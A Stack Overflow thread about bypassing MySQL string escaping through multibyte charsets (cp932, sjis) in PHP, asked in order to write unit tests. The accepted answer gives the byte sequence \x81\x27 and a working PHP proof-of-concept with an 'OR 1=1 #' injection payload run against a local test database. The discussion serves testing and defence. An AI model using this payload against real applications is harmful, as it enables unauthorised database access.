35

I'm writing some unit tests to ensure my code isn't vulnerable to SQL injection under various charsets.

According to this answer, you can create a vulnerability by injecting \xbf\x27 using one of the following charsets: big5, cp932, gb2312, gbk and sjis

This is because if your escaper is not configured correctly, it will see the 0x27 and try to escape it such that it becomes \xbf\x5c\x27. However, \xbf\x5c is actually one character in these charsets, thus the quote (0x27) is left unescaped.

As I've discovered through testing, however, this is not entirely true. It works for big5, gb2312 and gbk but neither 0xbf27 or 0xbf5c are valid characters in sjis and cp932.

Both

mb_strpos("abc\xbf\x27def","'",0,'sjis')

and

mb_strpos("abc\xbf\x27def","'",0,'cp932')

Return 4. i.e., PHP does not see \xbf\x27 as a single character. This returns false for big5, gb2312 and gbk.

Also, this:

mb_strlen("\xbf\x5c",'sjis')

Returns 2 (it returns 1 for gbk).

So, the question is: is there another character sequence that make sjis and cp932 vulnerable to SQL injection, or are they actually not vulnerable at all? or is PHP lying, I'm completely mistaken, and MySQL will interpret this totally differently?

Community
  • 1
  • 1
mpen
  • 272,448
  • 266
  • 850
  • 1,236
  • 6
    I've seen this SQL injection with [Node.JS](http://meta.security.stackexchange.com/a/2243/25859) while participating at a CTF. [The theory is there (page 34)](https://www.ipa.go.jp/files/000017321.pdf) on how it works but I can't seem to replicate it in PHP. More on what I tried [in the php chatroom](http://chat.stackoverflow.com/transcript/message/29401516#29401516). I will put a bounty on this question for anyone that can provide a concrete way/setup to exploit this in PHP. – HamZa Mar 17 '16 at 15:12
  • 1
    It's always good to test Your code. However, if you actually wish to make your application safer against SQL injection you might want to use prepared statements in your Gateways and send sql and data to the DB seperately. mysqli and pdo both support this approach of dealing with the problem. Using prepared statements can also give you significant gains in speed when You repeatedly execute the same statement with varying data. http://stackoverflow.com/questions/8263371/how-can-prepared-statements-protect-from-sql-injection-attacks – Max Mar 23 '16 at 18:29
  • The only way to prevent SQL injection attacks is to use parameterized queries instead of string concatenations and replacements. No amount of escaping is going to fix this. It's also far easier to write parameterized query code than it is to use string manipulation. The existence of that `mb_strpos` call means that the code is vulnerable to injection attacks – Panagiotis Kanavos Mar 24 '16 at 13:39
  • @PanagiotisKanavos Parameterized queries are no doubt the best practice and what should be encouraged, but the very question we're discussing here illustrates that your comment is factually incorrect - replacing the `query("SET NAMES {$charset}")` call with `set_charset($charset)` will make this attack impossible. – Narf Mar 24 '16 at 14:22
  • @PanagiotisKanavos I was using `mb_strpos` to test if the single quote appears under that charset, or if it was 'hidden' by the multi-byte char. I'm not using it in code. – mpen Mar 24 '16 at 18:10
  • @Max The problem with prepared statements is that they require an active connection, and you can't use them to "see" your prefilled statement. I was writing a "fake connection" escaper that would mostly be used for dumping queries, either for debugging or to a file which would be ran later. You can't use parametrized queries unless you're running the query on the spot. Regardless, it's nice to know what attacks are possible. – mpen Mar 24 '16 at 18:15

1 Answers1

20

The devil is in the details ... let's start with how answer in question describes the list of vulnerable character sets:

For this attack to work, we need the encoding that the server's expecting on the connection both to encode ' as in ASCII i.e. 0x27 and to have some character whose final byte is an ASCII \ i.e. 0x5c. As it turns out, there are 5 such encodings supported in MySQL 5.6 by default: big5, cp932, gb2312, gbk and sjis. We'll select gbk here.

This gives us some context - 0xbf5c is used as an example for gbk, not as the universal character to use for all of the 5 character sets.
It just so happens that the same byte sequence is also a valid character under big5 and gb2312.

At this point, your question becomes as easy as this:

Which byte sequence is a valid character under cp932 and sjis and ends in 0x5c?

To be fair, most of the google searches I tried for these character sets don't give any useful results. But I did find this CP932.TXT file, in which if you search for '5c ' (with the space there), you'll jump to this line:

0x815C 0x2015 #HORIZONTAL BAR

And we have a winner! :)

Some Oracle document confirms that 0x815c is the same character for both cp932 and sjis and PHP recognizes it too:

php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis"));
int(1)
int(1)

Here's a PoC script for the attack:

<?php
$username = 'username';
$password = 'password';

$mysqli = new mysqli('localhost', $username, $password);
foreach (array('cp932', 'sjis') as $charset)
{
        $mysqli->query("SET NAMES {$charset}");
        $mysqli->query("CREATE DATABASE {$charset}_db CHARACTER SET {$charset}");
        $mysqli->query("USE {$charset}_db");
        $mysqli->query("CREATE TABLE foo (bar VARCHAR(16) NOT NULL)");
        $mysqli->query("INSERT INTO foo (bar) VALUES ('baz'), ('qux')");

        $input = "\x81\x27 OR 1=1 #";
        $input = $mysqli->real_escape_string($input);
        $query = "SELECT * FROM foo WHERE bar = '{$input}' LIMIT 1";
        $result = $mysqli->query($query);
        if ($result->num_rows > 1)
        {
                echo "{$charset} exploit successful!\n";
        }

        $mysqli->query("DROP DATABASE {$charset}_db");
}
Community
  • 1
  • 1
Narf
  • 14,600
  • 3
  • 37
  • 66
  • Aha! I may have read that as "5 such encodings" that have 0xbf5c as a character, not that have a character ending with 0x5c. Great answer, thank you! – mpen Mar 18 '16 at 15:41
  • I'm curious about this actually... `\x81\x27` is **not** a valid character in cp932, yet it's still interpreted as 1 char (I guess because 0x81 is a "lead byte"). If it weren't, the `\x27` would need to be escaped and we'd be vulnerable. Are there any charsets in which `0x__27` is considered two chars, but `0x__5c` is one char? In such a scenario it would be tricky to escape correctly. – mpen Mar 18 '16 at 16:13
  • Nvm, [there doesn't appear to be any](https://gist.github.com/mnpenner/cd7806b645c35ea634d0) such charsets. – mpen Mar 18 '16 at 16:20
  • However, there [are a lot of naughty chars](https://gist.github.com/mnpenner/1c5524a531e513f2a97f) – mpen Mar 18 '16 at 16:37
  • 3
    Yep, `\x81` is a leading byte in `cp932`, `sjis` and a lazy check that doesn't use a table lookup would count it as valid. But even if that wasn't the case, it wouldn't matter ... the magic is in `mysql_real_escape_string()` treating it as ASCII and hence adding `\x5c` in the middle. – Narf Mar 18 '16 at 17:01